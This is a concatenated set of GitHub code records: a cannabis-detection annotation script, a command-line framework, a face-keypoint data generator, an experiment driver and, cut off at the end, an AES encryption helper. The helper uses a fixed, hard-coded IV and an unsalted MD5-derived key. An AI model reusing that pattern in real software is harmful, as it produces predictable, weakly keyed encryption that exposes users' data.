switch to ResNet 50 instead of 101\n\t#BACKBONE = \"resnet50\"\n\t# 4-band modifications.\n\t# alter utils.py in mrcnn folder, line 364 to leave 4 band in place\n\t# for 4-band images\n\tIMAGE_CHANNEL_COUNT = 4\n\t# adjust the mean pixel value for alpha-band\n\t# mean pixel caluclated as per the CNNabis_h5py file\n\t# default values from MaskRCNN were = [123.7, 116.8, 103.9]\n\tMEAN_PIXEL = np.array([58.87, 66.51, 59.69, 148.97])\n\t# Detection instances\n\tDETECTION_MAX_INSTANCES = 80\n\t# If enabled, resizes instance masks to a smaller size to reduce\n\t# memory load. Recommended when using high-resolution images.\n\tUSE_MINI_MASK = False # this is a real memory hog, try it at work\n\tMINI_MASK_SHAPE = (80, 80) # (56, 56) # (height, width) of the mini-mask\n\t# Ratios of anchors at each cell (width/height)\n\t# A value of 1 represents a square anchor, and 0.5 is a wide anchor\n\tRPN_ANCHOR_RATIOS = [0.5, 1, 2]\n\nconfig = CNNabisConfig()\n# for inference change here to increase images per GPU\nconfig.IMAGES_PER_GPU = 10\nconfig.BATCH_SIZE = config.IMAGES_PER_GPU\nconfig.IMAGE_SHAPE = np.array([config.IMAGE_MAX_DIM, config.IMAGE_MAX_DIM, config.IMAGE_CHANNEL_COUNT])\nconfig.display()\n\n\n# ## Create Model and Load Trained Weights\n\n# Create model object in inference mode.\nmodel = modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config)\n\n# Load weights trained on MS-COCO\nmodel.load_weights(COCO_MODEL_PATH, by_name=True)\n\n\n# COCO Class names\n# Index of the class in the list is its ID. For example, to get ID of\n# the teddy bear class, use: class_names.index('teddy bear')\n# We'll have to figure out the right order... it may come from train or val... currently these don't match :(\nclass_names = ['BG', 'outdoor_cannabis', \"hoop_greenhouse\", \"framed_greenhouse\", \"greenhouse_footprint\", \"pond\", \"water_tank\", \"bg\"]\n# class_names = ['BG', 'outdoor_cannabis', \"hoop_greenhouse\", \"framed_greenhouse\", \"greenhouse_footprint\", \"pond\", \"water_tank\"] # use this for the temp model\n\n# Load a random image from the images folder\nfile_names = glob.glob(os.path.join(IMAGE_DIR, '*.tif'))\n\n# here we are going to keep track of the images that we've already looked at.\n# we need to link this up to an actual file later on. TODO\nreviewed_images = []\n\ndef capture_choice(result):\n\tacceptable = ['y', 'n', 'r']\n\tuser_input = input(\"Should this image be included in annotations? 'y/n' or with review 'r'\")\n\tif user_input not in acceptable:\n\t\tprint(\"Please choose y, n, or r\")\n\t\tuser_input = capture_choice(result)\n\tif user_input == 'y':\n\t\treturn 'pass', result\n\tif user_input == 'n':\n\t\treturn 'rejected', None\n\tif user_input == 'r':\n\t\treturn 'send for review', result\n\n\ndef random_colors(N, bright=True):\n\t\"\"\"\n\tGenerate random colors.\n\tTo get visually distinct colors, generate them in HSV space then\n\tconvert to RGB.\n\t\"\"\"\n\tbrightness = 1.0 if bright else 0.7\n\thsv = [(i / N, 1, brightness) for i in range(N)]\n\tcolors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))\n\trandom.shuffle(colors)\n\treturn colors\n\ndef apply_mask(image, mask, color, alpha=0.5):\n\t\"\"\"Apply the given mask to the image.\n\t\"\"\"\n\tfor c in range(3):\n\t\timage[:, :, c] = np.where(mask == 1,\n\t\t\t\t\t\t\t\t image[:, :, c] *\n\t\t\t\t\t\t\t\t (1 - alpha) + alpha * color[c] * 255,\n\t\t\t\t\t\t\t\t image[:, :, c])\n\treturn image\n\ndef display_instances(image, boxes, masks, class_ids, class_names,\n\t\t\t\t\t scores=None, title=\"\",\n\t\t\t\t\t ax=None,\n\t\t\t\t\t show_mask=True, show_bbox=True,\n\t\t\t\t\t colors=None, captions=None,\n\t\t\t\t\t choices=None, rez=None, fig=None):\n\t\"\"\"\n\tboxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.\n\tmasks: [height, width, num_instances]\n\tclass_ids: [num_instances]\n\tclass_names: list of class names of the dataset\n\tscores: (optional) confidence scores for each box\n\ttitle: (optional) Figure title\n\tshow_mask, show_bbox: To show masks and bounding boxes or not\n\tfigsize: (optional) the size of the image\n\tcolors: (optional) An array or colors to use with each object\n\tcaptions: (optional) A list of strings to use as captions for each object\n\t\"\"\"\n\n\t# Number of instances\n\tN = boxes.shape[0]\n\tif not N:\n\t\tprint(\"\\n*** No instances to display *** \\n\")\n\telse:\n\t\tassert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]\n\n\t# Generate random colors\n\tcolors = colors or random_colors(N)\n\n\tax.clear()\n\t# Show area outside image boundaries.\n\theight, width = image.shape[:2]\n\tax.set_ylim(height + 10, -10)\n\tax.set_xlim(-10, width + 10)\n\tax.axis('off')\n\tax.set_title(title)\n\n\tmasked_image = image.astype(np.uint32).copy()\n\n\tfor i in range(N):\n\t\t# if class_ids[i] != 1 or class_ids[i] != 5:\n\t\t# \t# skip displaying these categories\n\t\t# \tcontinue\n\t\t# make categories_of_interest greater than 0 to signify we've at least one good box\n\t\t# categories_of_interest += 1\n\n\t\tcolor = colors[i]\n\n\t\t# Bounding box\n\t\tif not np.any(boxes[i]):\n\t\t\t# Skip this instance. Has no bbox. Likely lost in image cropping.\n\t\t\tcontinue\n\t\ty1, x1, y2, x2 = boxes[i]\n\t\tif show_bbox:\n\t\t\tp = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,\n\t\t\t\t\t\t\t\talpha=0.7, linestyle=\"dashed\",\n\t\t\t\t\t\t\t\tedgecolor=color, facecolor='none')\n\t\t\tax.add_patch(p)\n\n\t\t# Label\n\t\tif not captions:\n\t\t\tclass_id = class_ids[i]\n\t\t\tscore = scores[i] if scores is not None else None\n\t\t\tlabel = class_names[class_id]\n\t\t\tx = random.randint(x1, (x1 + x2) // 2)\n\t\t\tcaption = \"{} {:.3f}\".format(label, score) if score else label\n\t\telse:\n\t\t\tcaption = captions[i]\n\t\tax.text(x1, y1 + 8, caption,\n\t\t\t\tcolor='w', size=11, backgroundcolor=\"none\")\n\n\t\t# Mask\n\t\tmask = masks[:, :, i]\n\t\tif show_mask:\n\t\t\tmasked_image = apply_mask(masked_image, mask, color)\n\n\t\t# Mask Polygon\n\t\t# Pad to ensure proper polygons for masks that touch image edges.\n\t\tpadded_mask = np.zeros(\n\t\t\t(mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)\n\t\tpadded_mask[1:-1, 1:-1] = mask\n\t\tcontours = find_contours(padded_mask, 0.5)\n\t\tfor verts in contours:\n\t\t\t# Subtract the padding and flip (y, x) to (x, y)\n\t\t\tverts = np.fliplr(verts) - 1\n\t\t\tp = Polygon(verts, facecolor=\"none\", edgecolor=color)\n\t\t\tax.add_patch(p)\n\tax.imshow(masked_image.astype(np.uint8))\n\t# fig.canvas.draw()\n\tplt.draw()\n\tchoices.append(capture_choice(rez))\n\ndef Inference_now(file_names, IMAGE_DIR, model):\n\timgs_for_inference = []\n\ttitles = []\n\tchoices = []\n\tfor img in range(config.IMAGES_PER_GPU):\n\t\timg_choice = random.choice(file_names)\n\t\timgs_for_inference.append(skimage.io.imread(os.path.join(IMAGE_DIR, img_choice )))\n\t\t#imgs_for_inference.append(cv2.imread(os.path.join(IMAGE_DIR, img_choice), cv2.IMREAD_UNCHANGED))\n\t\ttitles.append(img_choice)\n\t\tprint(img_choice)\n\tresults = model.detect(imgs_for_inference, verbose=1)\n\tfig, ax = plt.subplots(1, figsize=(10, 10))\n\tplt.show(block=False)\n\t# Visualize resultsq\n\tfor count, rez in enumerate(results):\n\t\tif not rez['rois'].shape[0]:\n\t\t\tchoices.append(('rejected', None))\n\t\t\tcontinue\n\t\t############## Pickel rez for demo or experimentation purposes\n\t\t#import pickle\n\t\t#direct = os.getcwd()\n\t\t#with open(os.path.join(direct, str(count) + '.pickle'), 'wb') as handle:\n\t\t#\tpickle.dump(rez, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\t\t############## Pickel rez for demo or experimentation purposes\n\t\t# reorder bands\n\t\tcolor_img = imgs_for_inference[count][:, :, :3]\n\t\t# If no axis is passed, create one and automatically call show()\n\n\t\tdisplay_instances(color_img, rez['rois'], rez['masks'], rez['class_ids'],\n\t\t\t\tclass_names, rez['scores'], show_mask=False, title=titles[count], choices=choices, rez=rez,\n\t\t\t\t\t\t fig=fig, ax=ax)\n\treturn dict(zip(titles, choices))\n\ndef return_passed_dict(Cannavision_result, image_full_name, images, verified_data, img_count):\n\tinstance = Cannavision_result\n\tpath, file_name = os.path.split(image_full_name)\n\theight, width = instance['masks'].shape[:2]\n\tfiles = []\n\tCannavision_result['verts'] = [None] * len(Cannavision_result['class_ids'])\n\tAnn_dict = []\n\tfor cnt, cl_id in enumerate(Cannavision_result['class_ids']):\n\t\tif cl_id == 1 or cl_id == 5:\n\t\t\t# here we handle the image info and add to the verified_data object for writing later.\n\t\t\tif file_name in images:\n\t\t\t\timage_id = images[file_name]['id']\n\t\t\telse:\n\t\t\t\timg_dict = {\"file_name\": file_name, \"height\": height, \"width\": width, \"id\": img_count}\n\t\t\t\timages[file_name] = img_dict\n\t\t\t\tverified_data['images'].append(img_dict)\n\t\t\t\timage_id = img_count\n\t\t\t\timg_count += 1\n\t\t\t# now we build the annotation to append to the annotations object\n\t\t\tbbox = Cannavision_result['rois'][cnt].tolist()\n\t\t\tcategory_id = Cannavision_result['class_ids'][cnt]\n\t\t\t# if category id is 5 we need to change it to 2\n\t\t\tif category_id == 5:\n\t\t\t\tcategory_id = 2\n\n\t\t\t# Mask Polygon\n\t\t\t# Pad to ensure proper polygons for masks that touch image edges.\n\t\t\tmask = Cannavision_result['masks'][:, :, cnt]\n\t\t\t### enter fix here.\n\t\t\tpadded_mask = np.zeros(\n\t\t\t\t(mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)\n\t\t\tpadded_mask[1:-1, 1:-1] = mask\n\t\t\tcontours = find_contours(padded_mask, 0.5)\n\t\t\tfor verts in contours:\n\t\t\t\t# Subtract the padding and flip (y, x) to (x, y)\n\t\t\t\tverts = np.fliplr(verts) - 1\n\t\t\t\tsegmentation_raw = verts.tolist()\n\t\t\t\teven = [even[0] for even in segmentation_raw]\n\t\t\t\todd = [odd[1] for odd in segmentation_raw]\n\t\t\t\tsegmentation = [None] * (len(even) + len(odd))\n\t\t\t\tsegmentation[::2] = [x for x in even]\n\t\t\t\tsegmentation[1::2] = [x for x in odd]\n\t\t\tCannavision_result['verts'][cnt] = segmentation\n\t\t\tAnn_dict.append({\"segmentation\": [Cannavision_result['verts'][cnt]], \"image_id\": image_id,\n\t\t\t \"bbox\": bbox, \"category_id\": category_id})\n\t\t\t# here are the files that may need review\n\t\t\tfiles.append(file_name)\n\t\telse:\n\t\t\tcontinue\n\treturn Ann_dict, img_count, files\n\n\nif __name__ == \"__main__\":\n\t# construct the argument parser and parse the arguments\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-o\", \"--outfile\", default=home + '/_projects/Cannabis/3.4_Annotation_Augmentation/temp_passed.json',\n\t help=\"Path of folder containing all annotations files to merge\")\n\tap.add_argument(\"-r\", \"--review_outfile\", default=home + '/_projects/Cannabis/3.4_Annotation_Augmentation/temp_review.json',\n\t help=\"Path of folder containing all annotations files to merge\")\n\targs = vars(ap.parse_args())\n\n\t# read in annotation files\n\toutfile = args['outfile']\n\treview_outfile = args['review_outfile']\n\timage_review_folder = os.path.split(review_outfile)[0] + \"/images_for_review\"\n\t# create image review folder if doesn't exist\n\tif not os.path.exists(image_review_folder):\n\t\tos.mkdir(image_review_folder)\n\tprogress = os.path.split(review_outfile)[0] + \"/processed_images.txt\"\n\n\t# if a review annotation file exists, read it in and save it for merging with results later\n\t# we need to advance the image counter if this file exists. THe pass and review files should have the same images\n\t# so you shouldn't have to do this twice\n\tif os.path.exists(outfile):\n\t\twith open(outfile, 'r') as T:\n\t\t\tTEMP = T.read()\n\t\tverified_data = json.loads(TEMP)\n\t\tannotations = deepcopy(verified_data['annotations'])\n\telse:\n\t\tverified_data = {'images': [], 'type': 'instances', 'annotations': [],\n\t\t 'categories': [{'supercategory': 'none', 'id': 1, 'name': 'outdoor_cannabis'},\n\t\t {'supercategory': 'none', 'id': 2, 'name': 'pond'}]}\n\n\t# if a needs review annotation file exists, read it in\n\tif os.path.exists(review_outfile):\n\t\twith open(review_outfile, 'r') as T:\n\t\t\tTEMP = T.read()\n\t\tverified_data_review = json.loads(TEMP)\n\t\tannotations_for_review = deepcopy(verified_data_review['annotations'])\n\telse:\n\t\tannotations_for_review = []\n\n\t# keep track of the images we've already looked at using a txt file\n\tif os.path.exists(progress):\n\t\twith open(progress, 'r') as progresser:\n\t\t\tprogress_list = [line.strip() for line in progresser]\n\telse:\n\t\tprogress_list = []\n\t\twith open(progress, 'w') as temp_prog:\n\t\t\tpass\n\n\t# use the images object to use a number and retrieve a name\n\timages = {}\n\timg_count = 1\n\tfor im in verified_data['images']:\n\t\timages[im['file_name']] = im\n\t\timg_count += 1\n\n\t# use the cats object to use a number and retrieve a name\n\tcats = {}\n\tfor cat in verified_data['categories']:\n\t\tcats[cat['id']] = cat['name']\n\n\tstate = ''\n\twhile state != 'n':\n\t\tchoices = Inference_now(file_names, IMAGE_DIR, model)\n\t\t#print(choices)\n\t\tfor count, key in enumerate(choices):\n\t\t\tif choices[key][0] == 'rejected':\n\t\t\t\tfile = os.path.split(key)[1]\n\t\t\t\tprogress_list.append(file)\n\t\t\t\tcontinue\n\t\t\telif choices[key][0] == 'send for review':\n\t\t\t\tann_dict, img_count, file = return_passed_dict(choices[key][1], key, images, verified_data, img_count)\n\t\t\t\tannotations_for_review.extend(ann_dict)\n\t\t\t\tfile_n = os.path.join(IMAGE_DIR, file[0])\n\t\t\t\tcopyfile(file_n, os.path.join(image_review_folder, file[0]))\n\t\t\t\tif file not in progress_list:\n\t\t\t\t\tprogress_list.append(file[0])\n\t\t\telif choices[key][0] == 'pass':\n\t\t\t\tann_dict, img_count, file = return_passed_dict(choices[key][1], key, images, verified_data, img_count)\n\t\t\t\t#print(ann_dict)\n\t\t\t\tannotations.extend(ann_dict)\n\t\t\t\tif file not in progress_list:\n\t\t\t\t\tprogress_list.append(file[0])\n\t\tstate = input(\"Continue? (y/n)\")\n\t\tplt.close()\n\n\t# Create the structure to write out pass annotations file\n\tdata = {}\n\tdata['type'] = \"instances\"\n\tdata['images'] = verified_data['images']\n\tdata['annotations'] = annotations\n\tdata['categories'] = verified_data['categories']\n\t# if outfile exists, read it in and merge with data\n\ttry:\n\t\twith open(outfile, 'w') as W:\n\t\t\tW.write(str(data).replace('\\'', '\\\"').replace(' ', ''))\n\texcept:\n\t\tprint(\"Couldn't write to file\")\n\t# Create the structure to write out pass annotations file\n\tdata_for_review = {}\n\tdata_for_review['type'] = \"instances\"\n\tdata_for_review['images'] = verified_data['images']\n\tdata_for_review['annotations'] = annotations_for_review\n\tdata_for_review['categories'] = verified_data['categories']\n\ttry:\n\t\twith open(review_outfile, 'w') as W:\n\t\t\tW.write(str(data_for_review).replace('\\'', '\\\"').replace(' ', ''))\n\texcept:\n\t\tprint(\"Couldn't write to file\")\n\n\t# read in the old progress so we can update only the new files to the document. THis is probably overkill...\n\twith open(progress, 'r') as progresser:\n\t\tprogress_prev = [line.strip() for line in progresser]\n\twith open(progress, 'a') as progress_appender:\n\t\tfor file in progress_list:\n\t\t\tif file not in progress_prev:\n\t\t\t\tprogress_appender.write(file + '\\n')\n\n\n\n","repo_name":"jvhurley/CNNabis","sub_path":"3.4_Annotation_Augmentation/CannaVision_augment_dataset.py","file_name":"CannaVision_augment_dataset.py","file_ext":"py","file_size_in_byte":16738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74902064145","text":"from __future__ import print_function, absolute_import, unicode_literals\nfrom ._compat import input, with_metaclass, string_types\n##################################################################\n# This module is desired by Django\n##################################################################\nimport sys, os\nfrom optparse import make_option, OptionParser, IndentedHelpFormatter\nimport logging\nimport inspect\n\nlog = logging\n\ndef handle_default_options(options):\n \"\"\"\n Include any default options that all commands should accept here\n so that ManagementUtility can handle them before searching for\n user commands.\n\n \"\"\"\n pass\n\nclass CommandError(Exception):\n \"\"\"\n Exception class indicating a problem while executing a management\n command.\n\n If this exception is raised during the execution of a management\n command, it will be caught and turned into a nicely-printed error\n message to the appropriate output stream (i.e., stderr); as a\n result, raising this exception (with a sensible description of the\n error) is the preferred way to indicate that something has gone\n wrong in the execution of a command.\n\n \"\"\"\n pass\n\ndef get_answer(message, answers='Yn', default='Y', quit=''):\n \"\"\"\n Get an answer from stdin, the answers should be 'Y/n' etc.\n If you don't want the user can quit in the loop, then quit should be None.\n \"\"\"\n if quit and quit not in answers:\n answers = answers + quit\n \n message = message + '(' + '/'.join(answers) + ')[' + default + ']:'\n ans = input(message).strip().upper()\n if default and not ans:\n ans = default.upper()\n while ans not in answers.upper():\n ans = input(message).strip().upper()\n if quit and ans == quit.upper():\n print(\"Command be cancelled!\")\n sys.exit(1)\n return ans\n\ndef get_input(prompt, default=None, choices=None, option_value=None):\n \"\"\"\n If option_value is not None, then return it. Otherwise get the result from \n input.\n \"\"\"\n if option_value is not None:\n return option_value\n \n choices = choices or []\n while 1:\n r = input(prompt+' ').strip()\n if not r and default is not None:\n return default\n if choices:\n if r not in choices:\n r = None\n else:\n break\n else:\n break\n return r\n\n__commands__ = {}\n\ndef get_commands(modules):\n global __commands__\n \n def check(c):\n return (inspect.isclass(c) and \n issubclass(c, Command) and c is not Command and c is not CommandManager)\n \n def find_mod_commands(mod):\n for name in dir(mod):\n c = getattr(mod, name)\n if check(c):\n register_command(c)\n \n def collect_commands():\n for m in modules:\n try:\n mod = __import__(m, fromlist=['*'])\n except ImportError as e:\n if not str(e).startswith('No module named'):\n import traceback\n traceback.print_exc()\n continue\n \n find_mod_commands(mod)\n\n collect_commands()\n return __commands__\n \ndef register_command(kclass):\n global __commands__\n __commands__[kclass.name] = kclass\n\ndef call(prog_name, version, modules=None, args=None):\n from .commands import execute_command_line\n \n modules = modules or []\n \n if isinstance(args, string_types):\n import shlex\n args = shlex.split(args)\n \n execute_command_line(args or sys.argv, get_commands(modules), prog_name, version)\n\nclass CommandMetaclass(type):\n def __init__(cls, name, bases, dct):\n option_list = list(dct.get('option_list', []))\n for c in bases:\n if hasattr(c, 'option_list') and isinstance(c.option_list, list):\n option_list.extend(c.option_list)\n cls.option_list = option_list\n \nclass Command(with_metaclass(CommandMetaclass)):\n option_list = ()\n help = ''\n args = ''\n has_options = False\n\n def create_parser(self, prog_name, subcommand):\n \"\"\"\n Create and return the ``OptionParser`` which will be used to\n parse the arguments to this command.\n \n \"\"\"\n return OptionParser(prog=prog_name,\n usage=self.usage(subcommand),\n version='',\n add_help_option = False,\n option_list=self.option_list)\n def get_version(self):\n return \"%s version is %s\" % (self.prog_name, self.version)\n\n def usage(self, subcommand):\n \"\"\"\n Return a brief description of how to use this command, by\n default from the attribute ``self.help``.\n \n \"\"\"\n if self.has_options:\n usage = '%%prog %s [options] %s' % (subcommand, self.args)\n else:\n usage = '%%prog %s %s' % (subcommand, self.args)\n if self.help:\n return '%s\\n\\n%s' % (usage, self.help)\n else:\n return usage\n \n def print_help(self, prog_name, subcommand):\n \"\"\"\n Print the help message for this command, derived from\n ``self.usage()``.\n \n \"\"\"\n parser = self.create_parser(prog_name, subcommand)\n parser.print_help()\n \n def run_from_argv(self, prog, subcommand, global_options, argv):\n \"\"\"\n Set up any environment changes requested, then run this command.\n \n \"\"\"\n self.prog_name = prog\n parser = self.create_parser(prog, subcommand)\n options, args = parser.parse_args(argv)\n self.execute(args, options, global_options)\n \n def execute(self, args, options, global_options):\n try:\n self.handle(options, global_options, *args)\n except CommandError as e:\n log.exception(e)\n sys.exit(1)\n\n def handle(self, options, global_options, *args):\n \"\"\"\n The actual logic of the command. Subclasses must implement\n this method.\n \n \"\"\"\n raise NotImplementedError()\n \nclass NewFormatter(IndentedHelpFormatter):\n def format_heading(self, heading):\n return \"%*s%s:\\n\" % (self.current_indent, \"\", 'Global Options')\n\nclass NewOptionParser(OptionParser):\n def _process_args(self, largs, rargs, values):\n while rargs:\n arg = rargs[0]\n longarg = False\n try:\n if arg[0:2] == \"--\" and len(arg) > 2:\n # process a single long option (possibly with value(s))\n # the superclass code pops the arg off rargs\n longarg = True\n self._process_long_opt(rargs, values)\n elif arg[:1] == \"-\" and len(arg) > 1:\n # process a cluster of short options (possibly with\n # value(s) for the last one only)\n # the superclass code pops the arg off rargs\n self._process_short_opts(rargs, values)\n else:\n # it's either a non-default option or an arg\n # either way, add it to the args list so we can keep\n # dealing with options\n del rargs[0]\n raise Exception\n except:\n if longarg:\n if '=' in arg:\n del rargs[0]\n largs.append(arg)\n \nclass CommandManager(Command):\n usage_info = \"%prog [global_options] [subcommand [options] [args]]\"\n \n def __init__(self, argv=None, commands=None, prog_name=None, global_options=None, version=None):\n self.argv = argv\n self.version = version\n self.prog_name = prog_name or os.path.basename(self.argv[0])\n self.commands = commands\n self.global_options = global_options\n \n def get_commands(self):\n if callable(self.commands):\n commands = self.commands()\n else:\n commands = self.commands\n return commands\n \n def print_help_info(self, global_options):\n \"\"\"\n Returns the script's main help text, as a string.\n \"\"\"\n usage = ['',\"Type '%s help ' for help on a specific subcommand.\" % self.prog_name,'']\n usage.append('Available subcommands:')\n commands = list(self.get_commands().keys())\n commands.sort()\n for cmd in commands:\n usage.append(' %s' % cmd)\n return '\\n'.join(usage)\n \n def fetch_command(self, global_options, subcommand):\n \"\"\"\n Tries to fetch the given subcommand, printing a message with the\n appropriate command called from the command line (usually\n \"uliweb\") if it can't be found.\n \"\"\"\n commands = self.get_commands()\n try:\n klass = commands[subcommand]\n except KeyError:\n sys.stderr.write(\"Unknown command: %r\\nType '%s help' for usage.\\n\" % \\\n (subcommand, self.prog_name))\n sys.exit(1)\n return klass\n \n def execute(self):\n \"\"\"\n Given the command-line arguments, this figures out which subcommand is\n being run, creates a parser appropriate to that command, and runs it.\n \"\"\"\n # Preprocess options to extract --settings and --pythonpath.\n # These options could affect the commands that are available, so they\n # must be processed early.\n parser = NewOptionParser(prog=self.prog_name,\n usage=self.usage_info,\n# version=self.get_version(),\n formatter = NewFormatter(),\n add_help_option = False,\n option_list=self.option_list)\n \n if not self.global_options:\n global_options, args = parser.parse_args(self.argv)\n handle_default_options(global_options)\n args = args[1:]\n else:\n global_options = self.global_options\n args = self.argv\n \n def print_help(global_options):\n parser.print_help()\n sys.stderr.write(self.print_help_info(global_options) + '\\n')\n sys.exit(1)\n \n if len(args) == 0:\n if global_options.version:\n print(self.get_version())\n sys.exit(1)\n else:\n print_help(global_options)\n sys.ext(1)\n \n try:\n subcommand = args[0]\n except IndexError:\n subcommand = 'help' # Display help if no arguments were given.\n \n if subcommand == 'help':\n if len(args) > 1:\n command = self.fetch_command(global_options, args[1])\n if issubclass(command, CommandManager):\n cmd = command(['help'], None, '%s %s' % (self.prog_name, args[1]), global_options=global_options)\n cmd.execute()\n else:\n command().print_help(self.prog_name, args[1])\n sys.exit(1)\n else:\n print_help(global_options)\n if global_options.help:\n print_help(global_options)\n else:\n command = self.fetch_command(global_options, subcommand)\n if issubclass(command, CommandManager):\n cmd = command(args[1:], None, '%s %s' % (self.prog_name, subcommand), global_options=global_options)\n cmd.execute()\n else:\n cmd = command()\n cmd.run_from_argv(self.prog_name, subcommand, global_options, args[1:])\n \nclass ApplicationCommandManager(CommandManager):\n option_list = (\n make_option('--help', action='store_true', dest='help',\n help='show this help message and exit.'),\n make_option('-v', '--verbose', action='store_true', \n help='Output the result in verbose mode.'),\n make_option('--version', action='store_true', dest='version',\n help=\"show program's version number and exit.\"),\n )\n help = ''\n args = ''\n \ndef execute_command_line(argv=None, commands=None, prog_name=None, version=None):\n m = ApplicationCommandManager(argv, commands, prog_name, version=version)\n m.execute()\n \nif __name__ == '__main__':\n execute_command_line(sys.argv)","repo_name":"limodou/parm","sub_path":"parm/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":12433,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"40011803684","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nimport os\nfrom sklearn.model_selection import train_test_split\n\nresize=100\n\ndirect='./combined'\n\n\n\nlistn=[]\n\ndata=[]\nannot=[]\nfor filename in os.listdir(direct): \n\tif(filename.split('.')[1]!='pts'):\n \t\tlistn.append(filename)\nq=0\nfor k in listn:\n\tprint(q)\n\tq+=1\n\n\tx=[]\n\ty=[]\n\twith open(direct+'/'+k.split('.')[0]+'.pts') as f:\n\t annots= f.readlines()[3:-1]\n\tfor i in annots:\n\t\ti=i.rstrip(\"\\r\\n\")\n\t\ttry:\n\t\t\tx1,y1=i.split(' ')\n\t\texcept:\n\t\t\tprint(k)\n\t\tx1=float(x1)\n\t\ty1=float(y1)\n\t\tx.append(x1)\n\t\ty.append(y1)\n\n\timage=cv2.imread(direct+'/'+k)\n\tresized_image = cv2.resize(image, (resize, resize))\n\ttry:\n\t\txs,ys,_=image.shape\n\texcept:\n\t\tcontinue\n\txscale=resize/xs\n\tyscale=resize/ys\n\n\tx2= [i * yscale for i in x]\n\ty2= [i * xscale for i in y]\n\n\tx22=np.array([x2,y2])\n\n\n\n\tdata.append(resized_image)\n\tannot.append(x22)\n\nprint('data loaded......')\n\nX=np.array(data)\nY=np.array(annot)\n\nprint('converted to array...........')\n\nx_train, x_test, y_train, y_test = train_test_split(X, Y, random_state=42)\n\n\nprint('saving train test...............')\nnp.save('x_keypoints_train',x_train)\n\nnp.save('x_keypoints_test',x_test)\n\nnp.save('y_keypoints_test',y_test)\nnp.save('y_keypoints_train',y_train)\n\n\t\n","repo_name":"TejaGollapudi/Facial-Keypoint-Annotation","sub_path":"300 wild face annotations/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73978857427","text":"import subprocess\nimport os\nimport sys\nimport argparse\n\nthis_directory = os.path.dirname(os.path.realpath(__file__)) + \"/\"\nthis_filename = sys.argv[0].split('/')[-1]\n\nparser = argparse.ArgumentParser(description='Sriver script to run experiments, extract the result and generate the figures.',\n usage='python {} -s stage'.format(this_filename[:-3]))\n\nparser.add_argument('-e', '--environment', type=str, choices=['local', 'cluster'], default='local',\n help='Run the experiments locally or in the cluster. Only for the scan action. Default: local')\n\nparser.add_argument('-a', '--action', type=str, choices=['scan', 'extract', 'plot'],\n help='Which action to run, required option')\n\nparser.add_argument('-t', '--testcases', default='lhc,sps,ps',\n help='A comma separated list of the testcases to run. Default: lhc,sps,ps')\n\nparser.add_argument('-d', '--dir', type=str, default='./results/local',\n help='Directory to store the output data (scan) or to read the input (extract, plot). Default: ./results/local')\n\n\nscripts = {\n 'scan': os.path.join(this_directory, 'scan/scan.py'),\n 'extract': os.path.join(this_directory, 'extract/extract_all.py'),\n 'plot': os.path.join(this_directory, 'plot/plot_all.py'),\n}\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n environment = args.environment\n\n if args.action == 'scan':\n print('Running: {} action.'.format(args.action))\n cmd = ['python', scripts['scan'],\n '-e', args.environment,\n '-o', os.path.join(args.dir, environment),\n '-t', args.testcases]\n subprocess.run(cmd, stdout=sys.stdout,\n stderr=subprocess.STDOUT, env=os.environ.copy())\n\n elif args.action == 'extract':\n print('Running: {} action.'.format(args.action))\n cmd = ['python', scripts['extract'], '-i', args.dir,\n '-t', args.testcases]\n subprocess.run(cmd, stdout=sys.stdout,\n stderr=subprocess.STDOUT, env=os.environ.copy())\n\n elif args.action == 'plot':\n print('Running: {} action.'.format(args.action))\n cmd = ['python', scripts['plot'], '-i', args.dir,\n '-t', args.testcases] \n subprocess.run(cmd, stdout=sys.stdout,\n stderr=subprocess.STDOUT, env=os.environ.copy())\n","repo_name":"kiliakis/hblond-cf2020-ae","sub_path":"hblond/scripts/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4257950989","text":"from cryptography.hazmat.primitives import ciphers\nfrom cryptography.hazmat.primitives.ciphers import algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import padding\nimport hashlib\n\n\ndef encrypt(plainText, workingKey):\n iv = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\"\n padder = padding.PKCS7(128).padder()\n padded_data = padder.update(plainText.encode()) + padder.finalize()\n\n key = hashlib.md5(workingKey.encode()).digest()\n cipher = ciphers.Cipher(algorithms.AES(key), modes.CBC(iv), default_backend())\n encryptor = cipher.encryptor()\n\n cipherText = encryptor.update(padded_data) + encryptor.finalize()\n return cipherText.hex()\n\n\ndef decrypt(cipherText, workingKey):\n iv = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\"\n key = hashlib.md5(workingKey.encode()).digest()\n\n cipher = ciphers.Cipher(algorithms.AES(key), modes.CBC(iv), default_backend())\n decryptor = cipher.decryptor()\n\n encrypted_data = bytes.fromhex(cipherText)\n padded_plainText = decryptor.update(encrypted_data) + decryptor.finalize()\n\n unpadder = padding.PKCS7(128).unpadder()\n plainText = unpadder.update(padded_plainText) + unpadder.finalize()\n\n return plainText.decode(\"utf-8\")\n\n\n# Testing\n# workingKey = \"ThisIsAKey123\"\n# plainText = \"Hello, World!\"\n\n# cipherText = encrypt(plainText, workingKey)\n# print(f\"Encrypted: 